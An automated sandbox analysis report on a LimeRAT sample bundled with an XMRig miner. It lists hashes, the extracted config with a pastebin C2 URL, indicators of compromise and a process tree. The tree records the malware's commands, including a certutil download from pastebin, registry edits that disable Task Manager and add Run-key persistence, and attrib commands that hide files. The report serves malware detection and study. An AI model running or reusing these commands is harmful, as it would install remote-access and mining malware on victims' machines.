limerat | c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e

Analysis

max time kernel
19s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
15-09-2022 12:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c787c9a5f407a656478efc835f1a0f8f738030bf26ced.exe
Size

772KB
MD5

7ed5b2dec02ef2ddc967fa9ca0dd8d2f
SHA1

0f471be520c5c78a0a40a4026237e04c366a3110
SHA256

c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e
SHA512

9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e
SSDEEP

12288:lToPWBv/cpGrU3y4dDG+A/rd/X78/SLKXt22Q2pnkhA/rd/X78vm:lTbBv5rUFDGr/rBXIxtrQm/rBXIe

Score

10^/10

limerat xmrig evasion miner persistence rat upx

Malware Config

Extracted

Family

limerat

Attributes

aes_key
beodz
antivm
false
c2_url
https://pastebin.com/raw/PEKpeQWU
delay
3
download_payload
false
install
true
install_name
winlogon.exe
main_folder
AppData
pin_spread
false
sub_folder
\AppData\Windows Protector\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 7 IoCs

miner

resource	yara_rule
behavioral2/files/0x0001000000022e32-226.dat	xmrig
behavioral2/memory/3680-253-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp	xmrig
behavioral2/memory/3680-256-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp	xmrig
behavioral2/memory/1468-261-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp	xmrig
behavioral2/memory/1468-277-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp	xmrig
behavioral2/memory/424-282-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp	xmrig
behavioral2/memory/424-287-0x00007FF62CCC0000-0x00007FF62D488000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
23	1736	WScript.exe
24	4948	WScript.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 6 IoCs

pid	Process
4988	windowsapp.exe
2860	irom.com
2404	lirb.com
4312	winlogon.exe
2832	64a1.com
3188	win.com

Sets file to hidden 1 TTPs 14 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
4696	attrib.exe
4700	attrib.exe
1996	attrib.exe
3068	attrib.exe
3696	attrib.exe
4420	attrib.exe
2712	attrib.exe
3496	attrib.exe
5032	attrib.exe
2964	attrib.exe
5104	attrib.exe
2208	attrib.exe
4108	attrib.exe
4244	attrib.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0001000000022e06-133.dat	upx
behavioral2/files/0x0001000000022e06-134.dat	upx
behavioral2/memory/4988-140-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/files/0x0001000000022e05-182.dat	upx
behavioral2/files/0x0001000000022e03-184.dat	upx
behavioral2/files/0x0004000000022e02-187.dat	upx
behavioral2/memory/4988-263-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/memory/4000-267-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral2/memory/4000-280-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	c787c9a5f407a656478efc835f1a0f8f738030bf26ced.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	windowsapp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	irom.com
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	lirb.com
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	64a1.com

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\software\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\software\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Logons = "C:\\Windows (x86)\\explorer.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Updates = "C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Windows Updates\\winupdate.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 6 IoCs

evasion

pid	Process
4496	taskkill.exe
4772	taskkill.exe
2188	taskkill.exe
3444	taskkill.exe
4740	taskkill.exe
4700	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	irom.com
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	64a1.com

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
540	reg.exe
5028	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3728	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2656	WMIC.exe
Token: SeSecurityPrivilege	2656	WMIC.exe
Token: SeTakeOwnershipPrivilege	2656	WMIC.exe
Token: SeLoadDriverPrivilege	2656	WMIC.exe
Token: SeSystemProfilePrivilege	2656	WMIC.exe
Token: SeSystemtimePrivilege	2656	WMIC.exe
Token: SeProfSingleProcessPrivilege	2656	WMIC.exe
Token: SeIncBasePriorityPrivilege	2656	WMIC.exe
Token: SeCreatePagefilePrivilege	2656	WMIC.exe
Token: SeBackupPrivilege	2656	WMIC.exe
Token: SeRestorePrivilege	2656	WMIC.exe
Token: SeShutdownPrivilege	2656	WMIC.exe
Token: SeDebugPrivilege	2656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2656	WMIC.exe
Token: SeRemoteShutdownPrivilege	2656	WMIC.exe
Token: SeUndockPrivilege	2656	WMIC.exe
Token: SeManageVolumePrivilege	2656	WMIC.exe
Token: 33	2656	WMIC.exe
Token: 34	2656	WMIC.exe
Token: 35	2656	WMIC.exe
Token: 36	2656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2656	WMIC.exe
Token: SeSecurityPrivilege	2656	WMIC.exe
Token: SeTakeOwnershipPrivilege	2656	WMIC.exe
Token: SeLoadDriverPrivilege	2656	WMIC.exe
Token: SeSystemProfilePrivilege	2656	WMIC.exe
Token: SeSystemtimePrivilege	2656	WMIC.exe
Token: SeProfSingleProcessPrivilege	2656	WMIC.exe
Token: SeIncBasePriorityPrivilege	2656	WMIC.exe
Token: SeCreatePagefilePrivilege	2656	WMIC.exe
Token: SeBackupPrivilege	2656	WMIC.exe
Token: SeRestorePrivilege	2656	WMIC.exe
Token: SeShutdownPrivilege	2656	WMIC.exe
Token: SeDebugPrivilege	2656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2656	WMIC.exe
Token: SeRemoteShutdownPrivilege	2656	WMIC.exe
Token: SeUndockPrivilege	2656	WMIC.exe
Token: SeManageVolumePrivilege	2656	WMIC.exe
Token: 33	2656	WMIC.exe
Token: 34	2656	WMIC.exe
Token: 35	2656	WMIC.exe
Token: 36	2656	WMIC.exe
Token: SeDebugPrivilege	2188	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4808	WMIC.exe
Token: SeSecurityPrivilege	4808	WMIC.exe
Token: SeTakeOwnershipPrivilege	4808	WMIC.exe
Token: SeLoadDriverPrivilege	4808	WMIC.exe
Token: SeSystemProfilePrivilege	4808	WMIC.exe
Token: SeSystemtimePrivilege	4808	WMIC.exe
Token: SeProfSingleProcessPrivilege	4808	WMIC.exe
Token: SeIncBasePriorityPrivilege	4808	WMIC.exe
Token: SeCreatePagefilePrivilege	4808	WMIC.exe
Token: SeBackupPrivilege	4808	WMIC.exe
Token: SeRestorePrivilege	4808	WMIC.exe
Token: SeShutdownPrivilege	4808	WMIC.exe
Token: SeDebugPrivilege	4808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4808	WMIC.exe
Token: SeRemoteShutdownPrivilege	4808	WMIC.exe
Token: SeUndockPrivilege	4808	WMIC.exe
Token: SeManageVolumePrivilege	4808	WMIC.exe
Token: 33	4808	WMIC.exe
Token: 34	4808	WMIC.exe
Token: 35	4808	WMIC.exe
Token: 36	4808	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3952 wrote to memory of 4988	3952	c787c9a5f407a656478efc835f1a0f8f738030bf26ced.exe	84
PID 3952 wrote to memory of 4988	3952	c787c9a5f407a656478efc835f1a0f8f738030bf26ced.exe	84
PID 3952 wrote to memory of 4988	3952	c787c9a5f407a656478efc835f1a0f8f738030bf26ced.exe	84
PID 4988 wrote to memory of 3556	4988	windowsapp.exe	86
PID 4988 wrote to memory of 3556	4988	windowsapp.exe	86
PID 3556 wrote to memory of 2656	3556	cmd.exe	88
PID 3556 wrote to memory of 2656	3556	cmd.exe	88
PID 3556 wrote to memory of 2188	3556	cmd.exe	89
PID 3556 wrote to memory of 2188	3556	cmd.exe	89
PID 3556 wrote to memory of 4808	3556	cmd.exe	90
PID 3556 wrote to memory of 4808	3556	cmd.exe	90
PID 3556 wrote to memory of 3444	3556	cmd.exe	91
PID 3556 wrote to memory of 3444	3556	cmd.exe	91
PID 3556 wrote to memory of 4388	3556	cmd.exe	94
PID 3556 wrote to memory of 4388	3556	cmd.exe	94
PID 3556 wrote to memory of 4740	3556	cmd.exe	95
PID 3556 wrote to memory of 4740	3556	cmd.exe	95
PID 3556 wrote to memory of 540	3556	cmd.exe	96
PID 3556 wrote to memory of 540	3556	cmd.exe	96
PID 3556 wrote to memory of 1532	3556	cmd.exe	97
PID 3556 wrote to memory of 1532	3556	cmd.exe	97
PID 3556 wrote to memory of 4208	3556	cmd.exe	98
PID 3556 wrote to memory of 4208	3556	cmd.exe	98
PID 3556 wrote to memory of 5016	3556	cmd.exe	99
PID 3556 wrote to memory of 5016	3556	cmd.exe	99
PID 3556 wrote to memory of 2556	3556	cmd.exe	100
PID 3556 wrote to memory of 2556	3556	cmd.exe	100
PID 3556 wrote to memory of 2860	3556	cmd.exe	101
PID 3556 wrote to memory of 2860	3556	cmd.exe	101
PID 3556 wrote to memory of 2860	3556	cmd.exe	101
PID 3556 wrote to memory of 2404	3556	cmd.exe	102
PID 3556 wrote to memory of 2404	3556	cmd.exe	102
PID 3556 wrote to memory of 2404	3556	cmd.exe	102
PID 3556 wrote to memory of 1996	3556	cmd.exe	103
PID 3556 wrote to memory of 1996	3556	cmd.exe	103
PID 3556 wrote to memory of 5104	3556	cmd.exe	104
PID 3556 wrote to memory of 5104	3556	cmd.exe	104
PID 3556 wrote to memory of 3068	3556	cmd.exe	105
PID 3556 wrote to memory of 3068	3556	cmd.exe	105
PID 2860 wrote to memory of 1736	2860	irom.com	106
PID 2860 wrote to memory of 1736	2860	irom.com	106
PID 2860 wrote to memory of 1736	2860	irom.com	106
PID 3556 wrote to memory of 4244	3556	cmd.exe	107
PID 3556 wrote to memory of 4244	3556	cmd.exe	107
PID 2860 wrote to memory of 4948	2860	irom.com	108
PID 2860 wrote to memory of 4948	2860	irom.com	108
PID 2860 wrote to memory of 4948	2860	irom.com	108
PID 3556 wrote to memory of 3696	3556	cmd.exe	109
PID 3556 wrote to memory of 3696	3556	cmd.exe	109
PID 2404 wrote to memory of 4312	2404	lirb.com	110
PID 2404 wrote to memory of 4312	2404	lirb.com	110
PID 2404 wrote to memory of 4312	2404	lirb.com	110
PID 3556 wrote to memory of 1480	3556	cmd.exe	112
PID 3556 wrote to memory of 1480	3556	cmd.exe	112
PID 3556 wrote to memory of 4036	3556	cmd.exe	113
PID 3556 wrote to memory of 4036	3556	cmd.exe	113
PID 3556 wrote to memory of 2672	3556	cmd.exe	114
PID 3556 wrote to memory of 2672	3556	cmd.exe	114
PID 3556 wrote to memory of 3040	3556	cmd.exe	115
PID 3556 wrote to memory of 3040	3556	cmd.exe	115
PID 3556 wrote to memory of 1788	3556	cmd.exe	116
PID 3556 wrote to memory of 1788	3556	cmd.exe	116
PID 3556 wrote to memory of 2396	3556	cmd.exe	117
PID 3556 wrote to memory of 2396	3556	cmd.exe	117

Views/modifies file attributes 1 TTPs 28 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4208	attrib.exe
4244	attrib.exe
3496	attrib.exe
2428	attrib.exe
1580	attrib.exe
4772	attrib.exe
4020	attrib.exe
4732	attrib.exe
4696	attrib.exe
1552	attrib.exe
4700	attrib.exe
1532	attrib.exe
4108	attrib.exe
5032	attrib.exe
3696	attrib.exe
2980	attrib.exe
3932	attrib.exe
2712	attrib.exe
2964	attrib.exe
1996	attrib.exe
4000	attrib.exe
5108	attrib.exe
4420	attrib.exe
3464	attrib.exe
5104	attrib.exe
3068	attrib.exe
3564	attrib.exe
2208	attrib.exe

C:\Users\Admin\AppData\Local\Temp\c787c9a5f407a656478efc835f1a0f8f738030bf26ced.exe
"C:\Users\Admin\AppData\Local\Temp\c787c9a5f407a656478efc835f1a0f8f738030bf26ced.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3952
- C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
  "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4988
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FE3B.tmp\FE3C.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='taskmgr.exe' delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2656
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2188
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='Taskmgr.exe' delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4808
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM Taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:3444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name='xmrig.exe' delete
      4⤵
      PID:4388
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM xmrig.exe /F
      4⤵
      Kills process with taskkill
      PID:4740
  - - C:\Windows\system32\reg.exe
      REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:540
  - - C:\Windows\system32\attrib.exe
      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
      4⤵
      Views/modifies file attributes
      PID:1532
  - - C:\Windows\system32\attrib.exe
      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
      4⤵
      Views/modifies file attributes
      PID:4208
  - - C:\Windows\system32\xcopy.exe
      xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
      4⤵
      PID:5016
  - - C:\Windows\system32\xcopy.exe
      xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
      4⤵
      PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
      "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2860
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:1736
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:4948
  - - C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com
      "C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2404
    - - C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
        
        "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
        5⤵
        Executes dropped EXE
        
        PID:4312
      - C:\Users\Admin\AppData\Local\Temp\tmp7698.tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp7698.tmp.exe"
        6⤵
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
        7⤵
        
        PID:4000
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\803C.tmp\803D.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
        8⤵
        
        PID:4584
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete
        9⤵
        
        PID:4812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM taskmgr.exe /F
        9⤵
        Kills process with taskkill
        
        PID:4700
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Taskmgr.exe' delete
        9⤵
        
        PID:4808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Taskmgr.exe /F
        9⤵
        Kills process with taskkill
        
        PID:4496
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='xmrig.exe' delete
        9⤵
        
        PID:3664
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM xmrig.exe /F
        9⤵
        Kills process with taskkill
        
        PID:4772
        
        C:\Windows\system32\reg.exe
        
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        9⤵
        Modifies registry key
        
        PID:5028
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        9⤵
        Views/modifies file attributes
        
        PID:3932
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        9⤵
        Views/modifies file attributes
        
        PID:3564
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        9⤵
        
        PID:3680
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        9⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
        9⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
        10⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
        10⤵
        
        PID:3512
        
        C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
        
        "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
        9⤵
        
        PID:5084
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2712
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4696
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2208
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4108
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5032
        
        C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        9⤵
        
        PID:1568
        
        C:\Windows\system32\find.exe
        
        find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        9⤵
        
        PID:4024
        
        C:\Windows\system32\cmd.exe
        
        cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
        9⤵
        
        PID:3492
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Microsoft.exe' delete
        9⤵
        
        PID:4332
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='winupdate.exe' delete
        9⤵
        
        PID:4928
        
        C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
        9⤵
        
        PID:4756
        
        C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
        9⤵
        
        PID:896
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        9⤵
        Views/modifies file attributes
        
        PID:3464
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        9⤵
        Views/modifies file attributes
        
        PID:1552
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
        9⤵
        Views/modifies file attributes
        
        PID:1580
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
        9⤵
        
        PID:3224
        
        C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
        9⤵
        
        PID:3996
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4700
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        9⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
        9⤵
        
        PID:2192
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
        10⤵
        
        PID:1328
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        9⤵
        
        PID:372
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
        9⤵
        
        PID:3160
        
        C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        9⤵
        Views/modifies file attributes
        
        PID:4772
        
        C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        9⤵
        
        PID:424
  - - C:\Windows\system32\attrib.exe
      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1996
  - - C:\Windows\system32\attrib.exe
      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:5104
  - - C:\Windows\system32\attrib.exe
      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3068
  - - C:\Windows\system32\attrib.exe
      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:4244
  - - C:\Windows\system32\attrib.exe
      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3696
  - - C:\Windows\system32\certutil.exe
